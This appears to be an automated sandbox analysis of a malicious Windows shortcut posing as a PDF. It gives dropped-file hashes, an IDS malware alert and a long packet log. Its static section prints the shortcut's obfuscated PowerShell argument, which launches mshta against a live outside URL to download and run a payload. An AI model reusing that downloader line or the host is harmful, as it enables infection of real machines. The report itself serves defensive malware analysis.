Preview:	%PDF-1.5..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(ru-RU) /StructTreeRoot 10 0 R/MarkInfo<</Marked true>>>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 134>>..stream..x.-.=..@.D....S..}.[."......).RS).........Q.v....i.v./&g..b..l..R.L%x....Lma.;......^U..1..:<T....G.1.(.i`.......z=<1..3.......endstream..endobj..5 0 obj..<</Type/Font/Subtype/TrueType/Name/F1/BaseFont/ABCDEE+Calibri/Encoding/WinAnsiEncoding/FontDescriptor 6 0 R/FirstChar 32/LastChar 32/Widths 17 0 R>>..endobj..6 0 obj..<</Type/FontDescriptor/FontName/ABCDEE+Calibri/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 521/MaxWidth 1743/FontWeight 400/XHeight 250/Stem

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6225
Entropy (8bit):	3.7458230610931342
Encrypted:	false
SSDEEP:	96:0w1YCkrbkvhkvCCtbT+G9HID5T+G9HIDj:0w10LbToD5ToDj
MD5:	2E2254D08AD06CCDCAEC50EBE73FA66F
SHA1:	5C408F2A75B630503B51D8016A9E7C62C2B93E7D
SHA-256:	0AEBAE62B52B11C8FFE482B55FB82809F2AB6E9C8393385542952D2BA80A18DD
SHA-512:	9633E7FAE0FB8C42D72B8C9A5C515FC4DD414241E26EB334D6DD71187C75FAF59A3A626E0E30DAEBBE1A805FC8FCF7CB194175A099A553F49050E83D2A954935
Malicious:	false
Preview:	...................................FL..................F.".. ....._.......<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg._....$...<..a....<......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=vY&j..........................3N.A.p.p.D.a.t.a...B.V.1.....vY$j..Roaming.@......EW.=vY$j.............................R.o.a.m.i.n.g.....\.1.....EW\|>..MICROS~1..D......EW.=vY)j..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=EW.>..........................$l..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=EW.>....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=EW.>....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=vY.j....9...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MZJ9IUSWETRG1OJAHBN6.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6225
Entropy (8bit):	3.7458230610931342
Encrypted:	false
SSDEEP:	96:0w1YCkrbkvhkvCCtbT+G9HID5T+G9HIDj:0w10LbToD5ToDj
MD5:	2E2254D08AD06CCDCAEC50EBE73FA66F
SHA1:	5C408F2A75B630503B51D8016A9E7C62C2B93E7D
SHA-256:	0AEBAE62B52B11C8FFE482B55FB82809F2AB6E9C8393385542952D2BA80A18DD
SHA-512:	9633E7FAE0FB8C42D72B8C9A5C515FC4DD414241E26EB334D6DD71187C75FAF59A3A626E0E30DAEBBE1A805FC8FCF7CB194175A099A553F49050E83D2A954935
Malicious:	false
Preview:	...................................FL..................F.".. ....._.......<..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg._....$...<..a....<......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=vY&j..........................3N.A.p.p.D.a.t.a...B.V.1.....vY$j..Roaming.@......EW.=vY$j.............................R.o.a.m.i.n.g.....\.1.....EW\|>..MICROS~1..D......EW.=vY)j..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=EW.>..........................$l..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=EW.>....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=EW.>....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=vY.j....9...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T0CNFCJB40B6EVARRPO6.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5440
Entropy (8bit):	3.4989781578841006
Encrypted:	false
SSDEEP:	48:2PnmjpUdLXuH8JMJlbT+Gl60SogZoBMJwMJa7T+GlJ0SogZoBMJwMJO1:2PnmyulT+GAHID5T+G9HIDj
MD5:	D98B252515438916257567D805A0CB8F
SHA1:	9446E399F406DD32FFB249EBDB1F4AC025382F41
SHA-256:	82201361F3D56274552A16E0520EEC7EC9776664960C575B346CC49D83F6FDD1
SHA-512:	9C6A94F115D1A01FFE19D0825A78782BB5247EC0AE25546DE0EC3B592D78938E60145AD046BE30C6D5E6D0AC0D4A9D3350F9ADED253EF8D28FDE6CD335A383AC
Malicious:	false
Preview:	...................................FL..................F.`.. ...J@.1a.....f..<....S..<...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........_....b.3a...B.i..<......2.....vY'j .FILEPD~1.LNK..j......EW.>vY'j...........................f.f.i.l.e.p.d.f...p.d.f...l.n.k...d.o.w.n.l.o.a.d...l.n.k.......f...............-.......e....................C:\Users\user\Desktop\filepdf.pdf.lnk.download.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e...................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\de9548f554282038.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5440
Entropy (8bit):	3.4989781578841006
Encrypted:	false
SSDEEP:	48:2PnmjpUdLXuH8JMJlbT+Gl60SogZoBMJwMJa7T+GlJ0SogZoBMJwMJO1:2PnmyulT+GAHID5T+G9HIDj
MD5:	D98B252515438916257567D805A0CB8F
SHA1:	9446E399F406DD32FFB249EBDB1F4AC025382F41
SHA-256:	82201361F3D56274552A16E0520EEC7EC9776664960C575B346CC49D83F6FDD1
SHA-512:	9C6A94F115D1A01FFE19D0825A78782BB5247EC0AE25546DE0EC3B592D78938E60145AD046BE30C6D5E6D0AC0D4A9D3350F9ADED253EF8D28FDE6CD335A383AC
Malicious:	false
Preview:	...................................FL..................F.`.. ...J@.1a.....f..<....S..<...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........_....b.3a...B.i..<......2.....vY'j .FILEPD~1.LNK..j......EW.>vY'j...........................f.f.i.l.e.p.d.f...p.d.f...l.n.k...d.o.w.n.l.o.a.d...l.n.k.......f...............-.......e....................C:\Users\user\Desktop\filepdf.pdf.lnk.download.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e...................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	2.69899161158286
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	filepdf.pdf.lnk.download.lnk
File size:	2'042 bytes
MD5:	25840bfeb06a9efbd1494278daf47d51
SHA1:	30379cfd8c42b5f9e4fc8bf5515fd7aca444fe96
SHA256:	a06aa1b7dae18601bae1fe1d840fcd0cfd8198d7ae12e29214eccc3bcd082a1c
SHA512:	391c11cfc85c0245c540e03457ef5bca90dd68d0e3c5ca93374c817a93365b04213cf2fea17243e9b9f2c393b88d4e9c34d4242b1b511acf1d454a9ef8d060b5
SSDEEP:	24:8A5/BHYVKVWO+/CW3rDt/OQlmVdd79ds5tliG5:8c5abfN/lqdJ9M5
TLSH:	7B413A112FF50724F3B78B756CB6B321997BB85AEE018F9D015082481831625E4B5F6B
File Content Preview:	L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	74f4f4dcece9e9ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	.(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T14:17:43.572825+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49750	94.156.177.166	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 14:17:23.397857904 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:23.517690897 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:23.523925066 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:23.523925066 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:23.643654108 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.961973906 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962037086 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962071896 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962086916 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962115049 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962137938 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962137938 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962150097 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962162018 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962181091 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962188959 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962196112 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962208033 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962208986 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962220907 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:24.962238073 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:24.962265968 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.081676960 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.081692934 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.081746101 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.172431946 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.172513008 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.172575951 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.172631025 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.176613092 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.176660061 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.176692009 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.176733017 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.183233023 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.183248043 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.183280945 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.183296919 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.191540956 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.191591024 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.191612959 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.191653967 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.199903965 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.199955940 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.199991941 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.200038910 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.208276987 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.208326101 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.208389997 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.208434105 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.216775894 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.216789961 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.216830015 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.216855049 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.225105047 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.225157022 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.225191116 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.225244999 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.232747078 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.232805014 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.232861996 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.232904911 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.240386963 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.240489960 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.240520954 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.240645885 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.248007059 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.248018980 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.248153925 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.382752895 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.382822037 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.382848978 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.383101940 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.385318041 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.385390997 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.386338949 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.386409044 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.386420965 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.386477947 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.391751051 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.391772032 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.391848087 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.391848087 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.396898985 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.397059917 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.397090912 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.397308111 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.402484894 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.402570963 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.402590990 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.402663946 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.407591105 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.407670975 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.407680988 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.407948017 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.412822008 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.412930012 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.412992954 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.418092966 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.418160915 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.418186903 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.418353081 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.423470020 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.423532963 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.423571110 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.423655987 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.428669930 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.428775072 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.428857088 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.433969975 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.434060097 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.434072018 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.434195042 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.439268112 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.439346075 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.439379930 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.439620018 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.444540024 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.444600105 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.444660902 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.444660902 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.449875116 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.449943066 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.449970961 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.450021982 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.455177069 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.455323935 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.455358028 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.455475092 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.460428953 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.460506916 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:25.460515022 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:25.460616112 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:30.224662066 CET	80	49700	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:30.224848986 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:32.125641108 CET	49700	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:32.577833891 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:32.698034048 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:32.698128939 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:32.699170113 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:32.818676949 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042202950 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042265892 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042335987 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042335987 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.042376041 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042428017 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042478085 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042483091 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.042514086 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042531013 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.042548895 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042582989 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042618036 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.042642117 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.042670012 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.162733078 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.162882090 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.162957907 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.234158039 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.234412909 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.234510899 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.238393068 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.238451004 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.238502026 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.246781111 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.246871948 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.246942997 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.255291939 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.255347967 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.255398035 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.263514996 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.263708115 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.263757944 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.271851063 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.271977901 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.272025108 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.280333042 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.280440092 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.280594110 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.288702965 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.288785934 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.288852930 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.297038078 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.297126055 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.297225952 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.305404902 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.305521011 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.305622101 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.313796997 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.313904047 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.313972950 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.354326963 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.396873951 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.426099062 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.426266909 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.426361084 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.428658009 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.428786039 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.428838968 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.433604956 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.433707952 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.433831930 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.438627005 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.438735008 CET	80	49728	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:34.438790083 CET	49728	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:34.443640947 CET	80	49728	94.156.177.166	192.168.2.7
